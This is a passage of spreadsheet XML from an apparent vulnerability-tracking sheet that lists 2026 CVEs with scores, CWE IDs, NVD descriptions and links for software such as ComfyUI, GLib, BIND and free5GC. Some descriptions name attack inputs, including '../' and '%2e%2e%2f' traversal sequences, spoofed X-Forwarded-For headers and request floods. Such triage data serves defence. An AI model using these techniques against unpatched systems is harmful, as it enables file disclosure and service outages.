      </c>
    </row>
    <row r="2667">
      <c r="A2667" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2667" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55552</t>
        </is>
      </c>
      <c r="C2667" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2667" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2667" s="5" t="inlineStr"/>
      <c r="F2667" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2667" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2667" s="5" t="inlineStr"/>
      <c r="I2667" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J2667" s="5" t="inlineStr"/>
      <c r="K2667" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2667" s="5" t="inlineStr">
        <is>
          <t>Yamcs is a mission control framework. Prior to 5.11.13, Yamcs StaticFileHandler.locateFile resolves an unauthenticated request path without using Path.normalize and Path.toAbsolutePath to confirm that the absolute path remains within the configured staticRoots. A path containing traversal segments can escape the intended web root and return an arbitrary readable host file. The flaw is in yamcs-core/src/main/java/org/yamcs/http/StaticFileHandler.java and can disclose sensitive operating-system and application data. This issue is fixed in version 5.11.13, and the 5.12 line is fixed from version 5.12.0.</t>
        </is>
      </c>
      <c r="M2667" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55552</t>
        </is>
      </c>
    </row>
    <row r="2668">
      <c r="A2668" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2668" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55553</t>
        </is>
      </c>
      <c r="C2668" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2668" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2668" s="5" t="inlineStr"/>
      <c r="F2668" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2668" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H2668" s="5" t="inlineStr"/>
      <c r="I2668" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J2668" s="5" t="inlineStr"/>
      <c r="K2668" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-201, CWE-522</t>
        </is>
      </c>
      <c r="L2668" s="5" t="inlineStr">
        <is>
          <t>urllib is an HTTP client for Node.js that supports authentication, redirects, timeouts, and other request features. Prior to 4.9.1 and 2.44.1, urllib follows redirects through followRedirect but reuses caller-supplied options across origins. In src/HttpClient.ts, #requestInternal recursively calls this.#requestInternal(nextUrl.href, options, requestContext), causing options.headers and auth or digestAuth values to be reused when the redirect target has a different scheme, host, or port. Authorization, Cookie, Proxy-Authorization, x-api-key, x-auth-token, and x-access-token can therefore be sent to an attacker-controlled redirected origin, exposing credentials intended for the original origin and potentially allowing reuse against the original partner API or related services. No user interaction is required. This issue is fixed in versions 2.44.1 and 4.9.1.</t>
        </is>
      </c>
      <c r="M2668" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55553</t>
        </is>
      </c>
    </row>
    <row r="2669">
      <c r="A2669" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2669" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55584</t>
        </is>
      </c>
      <c r="C2669" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2669" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2669" s="5" t="inlineStr"/>
      <c r="F2669" s="5" t="n">
        <v>0.024</v>
      </c>
      <c r="G2669" s="5" t="inlineStr"/>
      <c r="H2669" s="5" t="inlineStr"/>
      <c r="I2669" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J2669" s="5" t="inlineStr"/>
      <c r="K2669" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="L2669" s="5" t="inlineStr">
        <is>
          <t>phpSysInfo is a customizable PHP script that displays system information. Prior to 3.4.6, the PSI_ALLOWED access-control check in read_config.php trusts attacker-controlled X-Forwarded-For and Client-IP HTTP headers before REMOTE_ADDR. A remote unauthenticated attacker can supply an allowed address in one of these headers to impersonate a trusted client and access exposed hostname, kernel, CPU, memory, filesystem, and network-interface information. This issue is fixed in version 3.4.6.</t>
        </is>
      </c>
      <c r="M2669" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55584</t>
        </is>
      </c>
    </row>
    <row r="2670">
      <c r="A2670" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2670" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55620</t>
        </is>
      </c>
      <c r="C2670" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2670" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2670" s="5" t="inlineStr"/>
      <c r="F2670" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2670" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2670" s="5" t="inlineStr"/>
      <c r="I2670" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J2670" s="5" t="inlineStr"/>
      <c r="K2670" s="5" t="inlineStr">
        <is>
          <t>CWE-1124, CWE-770</t>
        </is>
      </c>
      <c r="L2670" s="5" t="inlineStr">
        <is>
          <t>eml_parser serves as a python module for parsing eml files and returning various information found in the e-mail as well as computed information. Prior to 3.0.2, eml_parser.routing.noparenthesis in eml_parser/routing.py removes parenthesized CFWS comments from Received: headers with a regex-based fix-point loop whose running time is quadratic in the nesting depth. A single Received: header with 5,000 nested parentheses causes approximately 1.3 seconds of CPU saturation per parsed message, and doubling the nesting depth approximately quadruples the running time. An attacker can submit relatively small EML files that consume multiple seconds of processing time, causing worker latency, queue backpressure, and possible service-level outages in synchronous gateways, sandboxes, and real-time triage pipelines. This issue is fixed in version 3.0.2.</t>
        </is>
      </c>
      <c r="M2670" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55620</t>
        </is>
      </c>
    </row>
    <row r="2671">
      <c r="A2671" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2671" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55784</t>
        </is>
      </c>
      <c r="C2671" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2671" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2671" s="5" t="inlineStr"/>
      <c r="F2671" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2671" s="5" t="inlineStr"/>
      <c r="H2671" s="5" t="inlineStr"/>
      <c r="I2671" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J2671" s="5" t="inlineStr"/>
      <c r="K2671" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="L2671" s="5" t="inlineStr">
        <is>
          <t>free5GC is an open-source implementation of the 5G core network. In version 1.4.4 and earlier, the AUSF component stores per-subscriber authentication state in a global sync.Map named AUSFContext.UePool in internal/context/context.go, keyed only by SUPI. Every request handled by internal/sbi/processor/ue_authentication.go creates an AusfUeContext, and AddAusfUeContextToPool executes ausfContext.UePool.Store(ausfUeContext.Supi, ausfUeContext), unconditionally replacing the active context for that SUPI. An attacker with access to the AUSF SBI/N12 interface can send concurrent POST /nausf-auth/v1/ue-authentications requests for the same target SUPI, causing all attempts to share one logical authentication context URL while K_aut, XRES, and EapID are repeatedly overwritten. A valid EAP-AKA' response for an earlier challenge is then checked against the latest context, causing AT_MAC verification to fail and denying authentication to the selected subscriber while the request flood continues. No fixed version is available as of this review.</t>
        </is>
      </c>
      <c r="M2671" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55784</t>
        </is>
      </c>
    </row>
    <row r="2672">
      <c r="A2672" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2672" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55841</t>
        </is>
      </c>
      <c r="C2672" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2672" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2672" s="5" t="inlineStr"/>
      <c r="F2672" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2672" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2672" s="5" t="inlineStr"/>
      <c r="I2672" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J2672" s="5" t="inlineStr"/>
      <c r="K2672" s="5" t="inlineStr">
        <is>
          <t>CWE-138</t>
        </is>
      </c>
      <c r="L2672" s="5" t="inlineStr">
        <is>
          <t>Graylog is a free and open log management platform. Prior to Graylog Server versions 6.3.12, 7.0.7, and 7.1.2 and Graylog Forwarder version 7.3, the FortiGate key-value syslog parser in graylog2-server/src/main/java/org/graylog2/inputs/codecs/GLFortiGateSyslogEvent.java and graylog2-server/src/main/java/org/graylog2/inputs/codecs/SyslogCodec.java mishandles field-like text inside quoted values. GLFortiGateSyslogEvent.getFields() uses KV_PATTERN and QUOTED_KV_PATTERN, while SyslogCodec.parse() invokes the FortiGateSyslogEvent parser; crafted values containing = or backslash-escaped quotes can cause embedded keys such as srcip, dstip, date, time, and tz to remove or overwrite original top-level fields or produce an invalid message that Graylog discards. An unauthenticated network sender who can submit syslog messages can therefore manipulate security-log fields or evade logging to obscure malicious activity. This issue is fixed in Graylog Server versions 6.3.12, 7.0.7, and 7.1.2 and Graylog Forwarder version 7.3.</t>
        </is>
      </c>
      <c r="M2672" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55841</t>
        </is>
      </c>
    </row>
    <row r="2673">
      <c r="A2673" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2673" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56671</t>
        </is>
      </c>
      <c r="C2673" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2673" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2673" s="5" t="inlineStr"/>
      <c r="F2673" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G2673" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H2673" s="5" t="inlineStr"/>
      <c r="I2673" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J2673" s="5" t="inlineStr"/>
      <c r="K2673" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2673" s="5" t="inlineStr">
        <is>
          <t>ComfyUI is a modular diffusion model GUI, api and backend with a graph/nodes interface. Prior to 0.28.0, get_model_preview in app/model_manager.py joins an unrestricted filename route capture to a selected model directory without a containment check, allowing an unauthenticated remote attacker to use traversal, encoded traversal, absolute paths, or an unbounded path_index to read image-decodable files and enumerate host paths. get_model_preview (app/model_manager.py) built the path with os.path.join(folder, filename) where filename is an unrestricted {filename:.*} route capture. Literal ../, percent-encoded %2e%2e%2f, and absolute paths all escaped the model directory; path_index was also unbounded. The target file is piped through Pillow and re-encoded as WEBP, so disclosure is limited to image-decodable files plus a file-existence/enumeration oracle (and internal-path leakage via path_index errors). This issue is fixed in version 0.28.0.</t>
        </is>
      </c>
      <c r="M2673" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56671</t>
        </is>
      </c>
    </row>
    <row r="2674">
      <c r="A2674" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2674" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56673</t>
        </is>
      </c>
      <c r="C2674" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2674" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2674" s="5" t="inlineStr"/>
      <c r="F2674" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2674" s="5" t="inlineStr"/>
      <c r="H2674" s="5" t="inlineStr"/>
      <c r="I2674" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J2674" s="5" t="inlineStr"/>
      <c r="K2674" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2674" s="5" t="inlineStr">
        <is>
          <t>ComfyUI is a modular diffusion model GUI, API, and backend with a graph-and-node interface. Prior to 0.28.0, folder_paths.get_annotated_filepath and exists_annotated_filepath join workflow-controlled annotated filenames to a base directory without a containment check, allowing an unauthenticated crafted POST /prompt workflow using LoadImage or sibling nodes to probe arbitrary host paths and exfiltrate image-format files through /view. LoadImage defines a VALIDATE_INPUTS method, which causes the execution engine to skip COMBO (input-directory) validation. Affected nodes include LoadImage, LoadImageMask, LoadImageOutput, LoadAudio, LoadLatent, LoadVideo, and Load3D. This issue is fixed in version 0.28.0.</t>
        </is>
      </c>
      <c r="M2674" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56673</t>
        </is>
      </c>
    </row>
    <row r="2675">
      <c r="A2675" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2675" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-5680</t>
        </is>
      </c>
      <c r="C2675" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2675" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2675" s="5" t="inlineStr"/>
      <c r="F2675" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2675" s="5" t="inlineStr"/>
      <c r="H2675" s="5" t="inlineStr"/>
      <c r="I2675" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J2675" s="5" t="inlineStr"/>
      <c r="K2675" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L2675" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Undertow. A remote attacker could exploit this vulnerability by sending specially crafted WebSocket messages with permessage-deflate negotiated. This could lead to excessive memory consumption due to the PerMessageDeflateFunction.largerBuffer() method using exponential doubling, resulting in a Denial of Service (DoS) for the affected application.</t>
        </is>
      </c>
      <c r="M2675" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-5680</t>
        </is>
      </c>
    </row>
    <row r="2676">
      <c r="A2676" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2676" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56845</t>
        </is>
      </c>
      <c r="C2676" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2676" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2676" s="5" t="inlineStr"/>
      <c r="F2676" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2676" s="5" t="inlineStr"/>
      <c r="H2676" s="5" t="inlineStr"/>
      <c r="I2676" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J2676" s="5" t="inlineStr"/>
      <c r="K2676" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2676" s="5" t="inlineStr">
        <is>
          <t>An unauthenticated path traversal (LFI) vulnerability exists under /custom-sounds/ when CustomSounds storage is configured to FileSystem. By including ../ sequences in the request path, an attacker can read arbitrary files outside the base directory.</t>
        </is>
      </c>
      <c r="M2676" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56845</t>
        </is>
      </c>
    </row>
    <row r="2677">
      <c r="A2677" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2677" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57098</t>
        </is>
      </c>
      <c r="C2677" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2677" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2677" s="5" t="inlineStr"/>
      <c r="F2677" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2677" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2677" s="5" t="inlineStr"/>
      <c r="I2677" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2677" s="5" t="inlineStr"/>
      <c r="K2677" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L2677" s="5" t="inlineStr">
        <is>
          <t>Improper verification of cryptographic signature in Windows RDP Client allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M2677" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57098</t>
        </is>
      </c>
    </row>
    <row r="2678">
      <c r="A2678" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2678" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57099</t>
        </is>
      </c>
      <c r="C2678" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2678" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2678" s="5" t="inlineStr"/>
      <c r="F2678" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2678" s="5" t="inlineStr">
        <is>
          <t>.net</t>
        </is>
      </c>
      <c r="H2678" s="5" t="inlineStr"/>
      <c r="I2678" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2678" s="5" t="inlineStr"/>
      <c r="K2678" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L2678" s="5" t="inlineStr">
        <is>
          <t>Allocation of resources without limits or throttling in ASP.NET Core allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2678" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57099</t>
        </is>
      </c>
    </row>
    <row r="2679">
      <c r="A2679" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2679" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58011</t>
        </is>
      </c>
      <c r="C2679" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2679" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2679" s="5" t="inlineStr"/>
      <c r="F2679" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2679" s="5" t="inlineStr"/>
      <c r="H2679" s="5" t="inlineStr">
        <is>
          <t>gnome:glib, redhat:enterprise_linux</t>
        </is>
      </c>
      <c r="I2679" s="5" t="inlineStr">
        <is>
          <t>2026-06-30</t>
        </is>
      </c>
      <c r="J2679" s="5" t="inlineStr"/>
      <c r="K2679" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2679" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in GLib. An out-of-bounds read of only 2 bytes can occur in the g_date_time_get_ymd function in the glib/gdatetime.c file when an invalid GDateTime object produced by the g_date_time_add_full function is processed. This flaw can corrupt the date output and potentially cause logic errors that may lead to a denial of service.</t>
        </is>
      </c>
      <c r="M2679" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58011</t>
        </is>
      </c>
    </row>
    <row r="2680">
      <c r="A2680" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2680" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58015</t>
        </is>
      </c>
      <c r="C2680" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2680" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2680" s="5" t="inlineStr"/>
      <c r="F2680" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G2680" s="5" t="inlineStr"/>
      <c r="H2680" s="5" t="inlineStr">
        <is>
          <t>gnome:glib, redhat:enterprise_linux</t>
        </is>
      </c>
      <c r="I2680" s="5" t="inlineStr">
        <is>
          <t>2026-06-30</t>
        </is>
      </c>
      <c r="J2680" s="5" t="inlineStr"/>
      <c r="K2680" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2680" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in GLib. The D-Bus client-side implementation of the DBUS_COOKIE_SHA1 SASL authentication mechanism does not validate the cookie_context parameter received from the server. A malicious D-Bus server can supply a cookie_context containing path traversal sequences, causing the client to read an arbitrary file and exfiltrate sensitive data by verifying guessed file contents against a generated hash.</t>
        </is>
      </c>
      <c r="M2680" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58015</t>
        </is>
      </c>
    </row>
    <row r="2681">
      <c r="A2681" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2681" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-5946</t>
        </is>
      </c>
      <c r="C2681" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2681" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2681" s="5" t="inlineStr"/>
      <c r="F2681" s="5" t="n">
        <v>0.019</v>
      </c>
      <c r="G2681" s="5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="H2681" s="5" t="inlineStr">
        <is>
          <t>isc:bind</t>
        </is>
      </c>
      <c r="I2681" s="5" t="inlineStr">
        <is>
          <t>2026-05-20</t>
        </is>
      </c>
      <c r="J2681" s="5" t="inlineStr"/>
      <c r="K2681" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-1287, CWE-20, CWE-617, CWE-754, CWE-843</t>
        </is>
      </c>
      <c r="L2681" s="5" t="inlineStr">
        <is>
          <t>Multiple flaws have been identified in `named` related to the handling of DNS messages whose CLASS is not Internet (`IN`) — for example, `CHAOS` or `HESIOD`, or DNS messages that specify meta-classes (`ANY` or `NONE`) in the question section. Specially crafted requests reaching the affected code paths — recursion, dynamic updates (`UPDATE`), zone change notifications (`NOTIFY`), or processing of `IN`-specific record types in non-`IN` data — can cause assertion failures in `named`.
This issue affects BIND 9 versions 9.11.0 through 9.16.50, 9.18.0 through 9.18.48, 9.20.0 through 9.20.22, 9.21.0 through 9.21.21, 9.11.3-S1 through 9.16.50-S1, 9.18.11-S1 through 9.18.48-S1, and 9.20.9-S1 through 9.20.22-S1.</t>
        </is>
      </c>
      <c r="M2681" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-5946</t>
        </is>
      </c>
    </row>
    <row r="2682">
      <c r="A2682" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2682" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59902</t>
        </is>
      </c>
      <c r="C2682" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2682" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2682" s="5" t="inlineStr"/>
      <c r="F2682" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2682" s="5" t="inlineStr">
        <is>
          <t>.net</t>
        </is>
      </c>
      <c r="H2682" s="5" t="inlineStr"/>
      <c r="I2682" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J2682" s="5" t="inlineStr"/>
      <c r="K2682" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L2682" s="5" t="inlineStr">
        <is>
          <t>Netty is an asynchronous, event-driven network application framework. Prior to 4.1.137.Final and 4.2.17.Final, io.netty.handler.codec.sctp.SctpMessageCompletionHandler limits incomplete messages and fragment counts but not maxBufferedBytes, allowing unauthenticated peers to exhaust memory with large SCTP fragments. This issue is fixed in versions 4.1.137.Final and 4.2.17.Final.</t>
        </is>
      </c>
      <c r="M2682" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59902</t>
        </is>
      </c>
    </row>
    <row r="2683">
      <c r="A2683" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2683" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61686</t>
        </is>
      </c>
      <c r="C2683" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2683" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2683" s="5" t="inlineStr"/>
      <c r="F2683" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2683" s="5" t="inlineStr"/>
      <c r="H2683" s="5" t="inlineStr"/>
      <c r="I2683" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2683" s="5" t="inlineStr"/>
      <c r="K2683" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L2683" s="5" t="inlineStr">
        <is>
          <t>SolidInvoice is an open-source invoicing platform. Prior to version 3.0.1, the `DataGrid` LiveComponent deserializes a `context` prop value using PHP's `unserialize()` after receiving it from the client. Because the prop is marked `writable: true`, an authenticated attacker can supply an arbitrary PHP serialized payload. Version 3.0.1 fixes the issue.</t>
        </is>
      </c>
      <c r="M2683" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61686</t>
        </is>
      </c>
    </row>
    <row r="2684">
      <c r="A2684" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2684" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62295</t>
        </is>
      </c>
      <c r="C2684" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2684" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2684" s="5" t="inlineStr"/>
      <c r="F2684" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2684" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2684" s="5" t="inlineStr"/>
      <c r="I2684" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J2684" s="5" t="inlineStr"/>
      <c r="K2684" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-400, CWE-674</t>
        </is>
      </c>
      <c r="L2684" s="5" t="inlineStr">
        <is>
          <t>HAPI FHIR is a complete implementation of the HL7 FHIR standard for healthcare interoperability in Java. Prior to 6.9.11, the JSON utility parser in org.hl7.fhir.utilities.json.parser.JsonParser enforces no maximum nesting depth for arrays or objects. As a result, a small but deeply nested, syntactically valid FHIR JSON document can trigger unbounded readArray() or readObject() recursion, raising a StackOverflowError before structural validation runs. An attacker who can submit JSON resources for validation can thus crash the request thread, and services that do not isolate StackOverflowError safely may experience worker loss or process instability — a denial-of-service condition. This issue is fixed in version 6.9.11.</t>
        </is>
      </c>
      <c r="M2684" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62295</t>
        </is>
      </c>
    </row>
    <row r="2685">
      <c r="A2685" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2685" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62296</t>
        </is>
      </c>
      <c r="C2685" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2685" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2685" s="5" t="inlineStr"/>
      <c r="F2685" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2685" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2685" s="5" t="inlineStr"/>
      <c r="I2685" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J2685" s="5" t="inlineStr"/>
      <c r="K2685" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-400, CWE-674</t>
        </is>
      </c>
      <c r="L2685" s="5" t="inlineStr">
        <is>
          <t>HAPI FHIR is a complete implementation of the HL7 FHIR standard for healthcare interoperability in Java. Prior to 6.9.11, XhtmlParser.java imposes no maximum element nesting depth, so a deeply nested text.div narrative triggers unbounded recursion between parseElementInner() and parseElement(), raising a StackOverflowError. An attacker who can submit FHIR resources containing such narratives can thus crash a parsing or validation worker thread, affecting validator services and any application that parses attacker-supplied FHIR JSON or XML. This issue is fixed in version 6.9.11.</t>
        </is>
      </c>
      <c r="M2685" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62296</t>
        </is>
      </c>
    </row>
    <row r="2686">
      <c r="A2686" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
